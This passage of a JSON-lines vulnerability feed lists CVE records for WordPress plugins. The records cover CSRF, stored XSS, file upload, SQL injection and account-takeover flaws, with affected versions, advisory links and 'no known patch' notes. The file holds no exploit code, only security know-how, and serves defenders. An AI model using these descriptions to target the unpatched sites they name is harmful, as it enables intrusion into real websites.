plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9892dd1-3939-41a9-a828-fa1bf7d96eb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9892dd1-3939-41a9-a828-fa1bf7d96eb8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-pwa-for-wp-and-amp-plugin-fixed-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-pwa-for-wp-and-amp-plugin-fixed-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b38a51d7-375e-4cca-88ba-ccab796ac134\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b38a51d7-375e-4cca-88ba-ccab796ac134\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4404","slug":"event-espresso-decaf","versionImpact":"4.10.11","description":"The Event Espresso 4 Decaf plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.10.11. This is due to missing or incorrect nonce validation on the ajaxHandler() function. This makes it possible for unauthenticated attackers to opt into notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89d3a9da-2496-4f75-ad8f-65629f198fe5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89d3a9da-2496-4f75-ad8f-65629f198fe5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2554360\\\/event-espresso-decaf\\\/trunk\\\/core\\\/domain\\\/services\\\/pue\\\/Stats.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2554360\\\/event-espresso-decaf\\\/trunk\\\/core\\\/domain\\\/services\\\/pue\\\/Stats.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6925","slug":"unlimited-addons-for-wpbakery-page-builder","versionImpact":"1.0.42","description":"The Unlimited Addons for WPBakery Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'importZipFile' function in versions up to, and including, 1.0.42. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin (the default is editor role, but access can also be granted to contributor role), to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78b76d6-4068-4141-9726-7db439aa6a9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78b76d6-4068-4141-9726-7db439aa6a9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-addons-for-wpbakery-page-builder\\\/trunk\\\/inc_php\\\/layouts\\\/unitecreator_layouts_exporter.class.php?rev=2900676#L703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-addons-for-wpbakery-page-builder\\\/trunk\\\/inc_php\\\/layouts\\\/unitecreator_layouts_exporter.class.php?rev=2900676#L703\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1500","slug":"royal-elementor-addons","versionImpact":"1.3.91","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Logo Widget in all versions up to, and including, 1.3.91 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8619c999-5cf7-4888-bdb2-815238411303?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8619c999-5cf7-4888-bdb2-815238411303?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L644\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L644\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L664\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L664\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4532","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as deleting cards via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64cf5f95-bbf0-4c5f-867b-62f1b7f6a42e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64cf5f95-bbf0-4c5f-867b-62f1b7f6a42e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6896","slug":"accelerated-mobile-pages","versionImpact":"1.0.96.1","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.96.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a5fdb9-4e36-43ce-88ce-cd75bb1d1e25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a5fdb9-4e36-43ce-88ce-cd75bb1d1e25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.96.1\\\/templates\\\/features.php#L7159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.96.1\\\/templates\\\/features.php#L7159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123278\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123278\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0926","slug":"custom-permalinks","versionImpact":"2.6.0","description":"The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-permalinks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-permalinks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/samiahmedsiddiqui\\\/custom-permalinks\\\/pull\\\/96\",\"name\":\"https:\\\/\\\/github.com\\\/samiahmedsiddiqui\\\/custom-permalinks\\\/pull\\\/96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-post-types-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-post-types-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-taxonomies-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-taxonomies-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10665","slug":"yaad-sarig-payment-gateway-for-wc","versionImpact":"2.2.4","description":"The Yaad Sarig Payment Gateway For WC plugin for WordPress is vulnerable to unauthorized modification & access of data due to a missing capability check on the yaadpay_view_log_callback() and yaadpay_delete_log_callback() functions in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and delete logs.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10409673-43dc-4c05-a996-120d753ebd6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10409673-43dc-4c05-a996-120d753ebd6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaad-sarig-payment-gateway-for-wc\\\/trunk\\\/classes\\\/class-wc-gateway-yaadpay.php#L2518\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaad-sarig-payment-gateway-for-wc\\\/trunk\\\/classes\\\/class-wc-gateway-yaadpay.php#L2518\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11353","slug":"clicksend-lead-capture-form","versionImpact":"1.1.0","description":"The SMS for Lead Capture Forms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_message() function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c68bb6-77a2-4232-923a-37f2c0327743?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c68bb6-77a2-4232-923a-37f2c0327743?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13709","slug":"linear","versionImpact":"2.8.1","description":"The Linear plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on the 'linear-debug'. This makes it possible for unauthenticated attackers to reset the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/includes\\\/class-linear-settings.php#L1874\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/includes\\\/class-linear-settings.php#L1874\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83af4ee4-2763-4706-8cb2-fa102a72be68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83af4ee4-2763-4706-8cb2-fa102a72be68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1489","slug":"wp-appbox","versionImpact":"4.5.4","description":"The WP-Appbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's appbox shortcode in all versions up to, and including, 4.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244084\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244084\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-appbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-appbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d58355d-2762-4ecc-aec2-52a1e3323017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d58355d-2762-4ecc-aec2-52a1e3323017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1362","slug":"easy-broken-link-checker","versionImpact":"9.0.2","description":"The URL Shortener | Conversion Tracking  | AB Testing  | WooCommerce WordPress plugin through 9.0.2 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting customers via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/035cc502-a514-440f-8808-5655c8c915e2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/035cc502-a514-440f-8808-5655c8c915e2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31585","slug":"leadfox","versionImpact":"2.1.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in leadfox Leadfox for WordPress allows Cross Site Request Forgery. This issue affects Leadfox for WordPress: from n\/a through 2.1.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/leadfox\\\/vulnerability\\\/wordpress-leadfox-for-wordpress-plugin-2-1-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/leadfox\\\/vulnerability\\\/wordpress-leadfox-for-wordpress-plugin-2-1-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2921","slug":"shorten-url","versionImpact":"1.6.8","description":"The Short URL WordPress plugin through 1.6.8 does not properly sanitise and escape a parameter before using it in SQL statement, leading to a SQL injection exploitable by users with relatively low privilege on the site, like subscribers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f85db4f-8493-4941-8f3c-e5258c581bdc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f85db4f-8493-4941-8f3c-e5258c581bdc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4365","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in versions up to, and including, 18.2. This is due to lacking authentication protections and sanitisation on the wpfm_edit_file_title_desc AJAX action. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c82154-d390-44ba-a54a-89f4bb69cdce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c82154-d390-44ba-a54a-89f4bb69cdce?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1377","slug":"happy-elementor-addons","versionImpact":"3.10.3","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018author_meta_tag\u2019 attribute of the Author Meta widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4531","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing cards via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18c1b3bb-9998-416f-a972-c4a51643579c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18c1b3bb-9998-416f-a972-c4a51643579c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4615","slug":"elespare","versionImpact":"3.1.2","description":"The Elespare \u2013 Blog, Magazine and Newspaper Addons for Elementor with Templates, Widgets, Kits, and Header\/Footer Builder. One Click Import: No Coding Required! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Horizontal Nav Menu' widget in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97a1ab2f-b531-46a7-ad51-a652fc078212?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97a1ab2f-b531-46a7-ad51-a652fc078212?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elespare\\\/trunk\\\/src\\\/widgets\\\/nav-menu-horizontal\\\/widget.php#L856\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elespare\\\/trunk\\\/src\\\/widgets\\\/nav-menu-horizontal\\\/widget.php#L856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6930","slug":"booking","versionImpact":"10.2.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' attribute within the plugin's bookingform shortcode in all versions up to, and including, 10.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaca776-03ce-43bb-9553-f455f57124a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaca776-03ce-43bb-9553-f455f57124a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L849\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L849\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123628\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123628\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8485","slug":"rest-api-to-miniprogram","versionImpact":"4.7.1","description":"The REST API TO MiniProgram plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.7.1 via the updateUserInfo() function due to missing validation on the 'openid' user controlled key that determines which user will be updated. This makes it possible for unauthenticated attackers to update arbitrary users' accounts, including their email to a @weixin.com email, which can then be leveraged to reset the password of the user's account, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b53066d3-2ff3-4460-896a-facd77455914?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b53066d3-2ff3-4460-896a-facd77455914?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-weixin-controller.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-weixin-controller.php#L264\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31569","slug":"related-posts-list-grid-and-slider-all-in-one","versionImpact":"3.0.0.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in wp-buy wordpress related Posts with thumbnails allows Stored XSS. This issue affects wordpress related Posts with thumbnails: from n\/a through 3.0.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/related-posts-list-grid-and-slider-all-in-one\\\/vulnerability\\\/wordpress-wordpress-related-posts-with-thumbnails-plugin-3-0-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/related-posts-list-grid-and-slider-all-in-one\\\/vulnerability\\\/wordpress-wordpress-related-posts-with-thumbnails-plugin-3-0-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
